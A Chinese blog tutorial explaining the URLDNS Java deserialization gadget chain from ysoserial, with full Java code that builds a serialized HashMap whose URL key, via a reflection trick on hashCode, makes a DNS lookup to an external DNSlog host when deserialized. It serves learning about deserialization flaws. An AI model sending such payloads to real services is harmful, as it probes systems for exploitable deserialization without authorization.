URLDNS链

最新推荐文章于 2023-08-22 01:45:00 发布
最新推荐文章于 2023-08-22 01:45:00 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: Java安全 文章标签: java 开发语言 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/128157812
版权

听说这个链子是最简单的链子之一了,但是却是来来回回看了好多遍才勉强看明白。

在 ysoserial 中我们可以看见链子是这样的:

*Gadget Chain:

* HashMap.readObject()

* HashMap.putVal()

* HashMap.hash()

* URL.hashCode()

简单流程:

1.HashMap接收一个类O(URL类)

2.类O(URL类)的hashCode()后续的一串链子可以发起DNS请求

3.HashMap的readObject刚好可以调用O.hashCode();

现在我们来编写类来观察如何触发DNS请求

package packet1;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class SerializeTest{
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static void main(String[] args) throws Exception {
        HashMap<URL, Integer> hashmap = new HashMap<URL, Integer>();
        URL url = new URL("http://25d13c3b.dns.1433.eu.org");
        Class<? extends URL> clazz = url.getClass();
        hashmap.put(url, 1);
        serialize(hashmap);
    }
}

这个类可以进行序列化,按照正常来说序列化的过程是不会进行DNS请求的,但是我们查看DNSlog平台:

发现序列化的时候就发起请求了,这样有几个非常不好的地方:

  1. 影响我们判断是否有URLDNS这个漏洞存在(因为我们是想要反序列化的时候触发)
  2. 最重要的是其实在序列化之后URL类里面的hashCode已经被改变了,反序列化的时候并不会触发

下图是URL类中的hashCode()方法;

这里只有当hashCode不为负一的时候才会走handler发起DNS请求

hashCode在初始化的时候已经被赋值成-1了:

但是我们序列化之后值已经被改变成为handler.hashCode

那么就有一个疑问,序列化的时候是怎么触发的?

我们跟进put:

发现会调用hash函数。跟进hash:

发现调用handler,并且此时hashCode的值被改变

跟进hashcode:

调用getProtocol(),调用getHost():

其他更细节的我就没跟进,但是我们需要知道调用URL的hashCode()之后,并且hashCode的值不为-1就会发起DNS请求。所以我们可以通过反射技术来改变值,以此来达到序列化的时候不进行DNS请求,但是反序列化的时候会进行DNS请求

所以让我们来改进代码:

序列化代码:

package packet1;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class SerializeTest{
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static void main(String[] args) throws Exception {
        HashMap<URL, Integer> hashmap = new HashMap<URL, Integer>();
        URL url = new URL("http://25d13c3b.dns.1433.eu.org");
        Class<? extends URL> clazz = url.getClass();
        Field field = clazz.getDeclaredField("hashCode");
        field.setAccessible(true);
        field.set(url, 1234);
        hashmap.put(url, 1);
        field.set(url, -1);
        serialize(hashmap);
    }
}

在put之前我们改变url的hashCode值不为-1,put之后我们把url的hashCode改为-1,之后再对hashmap进行序列化。

反序列化代码:

package packet1;

import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class UnSerializeTest {
    public static Object unSerialize(String Filename) throws IOException , ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws IOException, ClassNotFoundException {
        unSerialize("ser.bin");
    }
}

经过测试之后,序列化的时候不会发起DNS请求,反序列化之后可以发起DNS请求.

清风--
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java 反序列化(二) URLDNS分析
Vicl1fe的博客
03-24 708
前言
Java安全——URLDNS利用
qq_51663706的博客
09-06 1126
URLDNS利用
URLDNS分析
Sk1y的博客
03-28 1167
java反序列化漏洞3 文章目录java反序列化漏洞3反射URL类开始的子HashMap的put方法开始的子回过头来分析为什么我们要从HashMap类作为入口类呢?随谈 算是最简单的一条了吧,学习资料:Java反序列化漏洞专题-基础篇(21/09/05更新类加载部分)_哔哩哔哩_bilibili 反射 person.java package flection; public class Person { public String name; protected String se
java url dns_Java安全URLDNS
weixin_39918084的博客
02-13 158
Java安全URLDNS0x00 前言在学习Java的反序列化漏洞的时候,就不得不学习他的一个利用。很多刚刚入门的对于利用这个词可能比较陌生。那么这里先来了解一下Java反序列化和反序列化漏洞的一个产生。0x01 Java反序列化Java提供了一种对象序列化的机制,用一个字节序列表示一个对象,该字节包含对象的数据、对象的类型、对象的存储属性。字节序列写出到文件后,相当于可以持久报错了一个对...
Java反序列化入门之URLDNS1
08-03
1、 java.util.HashMap 重写了 readObject 方法: 2、 java.net.URL 对象的 hashCode 在计算时会调用 get
URLDNS反序列化学习.doc
07-09
URLDNS反序列化学习.doc
S02-URLDNS反序列化构造1
08-03
1. 首先使用 ysoserial 生成反序列化文件,然后自行编写反序列流程,触发构造 3. 触发请求: 4. 然后查看urldns中gadget的生成过程:
dns-over-wikipedia:使用在主题的Wikipedia页面上找到的官方接来重定向.idk域
03-03
维基百科上的DNS Wikipedia跟踪流行网站的官方URL。 安装了Wikipedia上的DNS后,通过搜索Wikipedia并从信息框中提取相关的URL来重定向以.idk结尾的域。 例子: 在浏览器地址栏中键入scihub.idk/ 观察重定向到...
用于监控url访问情况的工具
05-29
解压到相关路径,通过后面加接的方式可以判断整个URLDNS解析到跳转到访问情况整个过程的时间耗费,返回结果可以是json或者plain text,方便加入zabbix等监控工具中进行监控 使用实例: Usage: ./xcurl {URL} ...
Javaweb安全——反序列化漏洞-URLDNS
weixin_43610673的博客
05-21 485
反序列化- URLDNS 之前学过一遍Java反序列化漏洞,不过那次是从cc入手的,当时也看了好久,各种调试才搞明白。这次从调用简单的URLDNS开始从新捋一遍。 本文SDK为1.8 8u211 URLDNS ysoserial中一个利用,其触发的结果是一次DNS请求。可用于确认是否存在反序列化漏洞,因为整条均用Java内置的类构造,对第三方库没有依赖。 先来看看ysoserial当中的实现代码 public class URLDNS implements ObjectPayload<Obj
Java代码审计:Java反序列化入门之URLDNS
god_Zeo的安全博客
08-19 1232
0x00 前言 自学Java 代码审计,主要自己一个人学习,有点闭门造车,搜索引擎学习法,但是还是记录一下,也分享一下,也便于将来的总结和反思,如果我能终能学到什么,我也会重新梳理思路,为那些自学者提供一个好的思路,所以有了下面的系列文章java代码审计自学篇。 之前研究了,但是没有整理好,因为有hvv任务,所以推迟了一些,现在赶紧整理发出来。 0x01 Java反序列化介绍 Java反序列化漏洞的产生原因: 简单的说就是,在于开发者在重写 readObject 方法的时候,写入了漏洞代码。 序列化和反序列
URLDNS利用分析
m0_61506558的博客
11-28 680
URLDNSJava反序列化中比较简单的一个,由于URLDNS不需要依赖第三方的包,同时不限制jdk的版本,所以通常用于检测反序列化的点,URLDNS并不能执行命令,只能发送DNS请求。(一)原理HashMap在反序列化的时候会对传进来的对象进行hash计算获取hashCode,而URL类中的hashCode属性在特殊情况下的hashCode计算将触发dns查询(二)利用ysoserial中的URLDNS.javareturn ht;}}/****/}
Java反序列化之URLDNS
m0_62466350的博客
05-28 728
URLDNSjava原生态的一条利用,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列化漏洞URLDNS利用,只能发起DNS请求,并不能进行其他利用这条路还是比较简单的,通常用于存在反序列化漏洞进行验证的,学好了才能更好的为后面打基础。
Java代码审计13之URLDNS
最新发布
划水的小白白
08-22 420
1、简介urldns 2、hashmap与url类的分析 2.1、Hashmap类readObject方法的跟进 2.2、URL类hashcode方法的跟进 2.3、InetAddress类的getByName方法 3、整个路的分析 3.1、整理上述的思路 3.2、一些疑问的测试 3.3、hashmap的put方法分析 3.4、反射 3.5、整个代码 4、补充说明
[Java反序列化]URLDNS分析
Y4tacker的博客
05-25 619
文章目录结果分析利用(来自ysoserial)生成反序列化参考接 结果 成功触发 分析 利用(来自ysoserial) * HashMap.readObject() * HashMap.putVal() * HashMap.hash() * URL.hashCode() 生成 反序列化 参考接 https://zhuanlan.zhihu.com/p/149416105 https://www.cnblogs.com/v1ntlyn/p
URLDNS反序列化分析
11-30 616
URLDNS反序列化分析 这是正式学习的第一条java反序列化,这条也是java里面相对比较简单的,拿来入门正好。 URLDNS这条不依赖第三方库,这条无法执行系统命令,成功利用的结果也只是实现服务器的一次url解析,可以用这条来判断是否服务器是否存在反序列化。 ysoserial 说到java反序列化,就离不开ysoserial工具,这个工具可以帮助生成反序列化payload。ysoserial入口为ysoserial.GeneratePayload类,当然这是正常用法。 这里只看URLDN
java安全——ysoserial工具URLDNS分析
网络安全
09-08 1632
本篇我们将学习ysoserial工具的URLDNS,相对于前面学习的CC来说,URLDNS就比较简单了。 URLDNS是ysoserial工具用于检测是否存在Java反序列化漏洞的一个利用,通过URLDNS利用可以发起一次DNS查询请求,从而可以验证目标站点是否存在反序列化漏洞,并且该利用任何不需要第三方依赖,也没有JDK版本的限制。 但是URLDNS利用也只能用于发起DNS查询请求,也不能做其他事情,因此URLDNS更多的是用于POC检测。 有了前面的基础,这里直接上URLD
target_url里面的接为什么换了但是打开还是原来接的网站,怎么解决
08-12
总之,当target_url中的接打开的网站与预期不一致时,我们可以尝试清除缓存、强制刷新页面、使用其他的DNS服务器或联系网站管理员进行解决。 ### 回答3: 当我们在浏览器中访问一个网页时,通常会通过输入URL来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值